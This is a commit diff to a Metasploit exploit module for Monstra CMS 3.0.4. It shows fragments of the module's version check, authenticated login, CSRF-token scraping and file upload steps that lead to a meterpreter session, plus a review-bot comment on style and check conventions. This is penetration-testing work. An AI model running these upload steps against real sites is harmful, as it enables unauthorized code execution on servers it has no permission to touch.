modified regex, id=filesmanager lines

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-09 10:55:29 -05:00
parent bc33078e01
commit 44b9798afb
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 9 additions and 9 deletions


@ -69,11 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown return CheckCode::Unknown
end end
if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i if res.body =~ /<\/a>.*?Version (\d+\.\d+\.\d+)/i
version = Gem::Version.new($1) version = Gem::Version.new($1)
vprint_status("Monstra CMS: #{version}") vprint_status("Monstra CMS: #{version}")
if version == '3.0.4' if version.to_s == '3.0.4'
return CheckCode::Vulnerable return CheckCode::Vulnerable
else else
return CheckCode::Safe return CheckCode::Safe
@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
'vars_post' => { 'vars_post' => {
'login' => datastore['USERNAME'], 'login' => datastore['USERNAME'],
'password' => datastore['PASSWORD'], 'password' => datastore['PASSWORD'],
'login_submit' => 'Log+In', 'login_submit' => 'Log+In'
}, }
}) })
cookies = res.get_cookies cookies = res.get_cookies
@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(uri, 'admin' '/index.php'), 'uri' => normalize_uri(uri, 'admin' '/index.php'),
'cookie' => cookies, 'cookie' => cookies
}) })
fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil? fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
@ -134,9 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote
# Request for CSRF token for file upload. # Request for CSRF token for file upload.
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(uri, 'admin', '/index.php'), 'uri' => normalize_uri(uri, 'admin', '/index.php'),
'vars_get' => 'id=filesmanager', 'vars_get' => {'id' => 'filesmanager'},
'method' => 'GET', 'method' => 'GET',
'cookie' => cookies, 'cookie' => cookies
}) })
# Grabbing CSRF token from body # Grabbing CSRF token from body
@ -155,12 +155,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Lets Send Upload request. # Lets Send Upload request.
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(uri, 'admin', '/index.php'), 'uri' => normalize_uri(uri, 'admin', '/index.php'),
'vars_get' => 'id=filesmanager', 'vars_get' => {'id' => 'filesmanager'},
'method' => 'POST', 'method' => 'POST',
'cookie' => cookies, 'cookie' => cookies,
'Connection' => 'close', 'Connection' => 'close',
'data' => data, 'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
}) })
# Cleanup delete payload after get meterpreter. # Cleanup delete payload after get meterpreter.
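Review bot: In the first hunk the check returns `CheckCode::Vulnerable` on nothing more than a version string scraped from the page body, and `CheckCode::Safe` for every other version. Metasploit convention reserves Vulnerable for checks that actually confirm the flaw, so a banner match should be `return CheckCode::Appears`. The exact-match test also reports releases older than 3.0.4 as Safe, which is only correct if they are unaffected (the page does not say); if they are affected, `if version <= Gem::Version.new('3.0.4')` compares Version objects directly and avoids the `to_s` round-trip. Separately, in the third hunk `normalize_uri(uri, 'admin' '/index.php')` is missing a comma and works only through adjacent-literal concatenation; `normalize_uri(uri, 'admin', '/index.php')` would match the other calls. The enclosing check method starts and ends outside the hunk.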